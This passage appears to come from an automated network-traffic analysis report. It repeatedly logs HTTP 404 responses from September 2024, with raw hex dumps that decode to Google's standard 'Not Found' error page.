70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 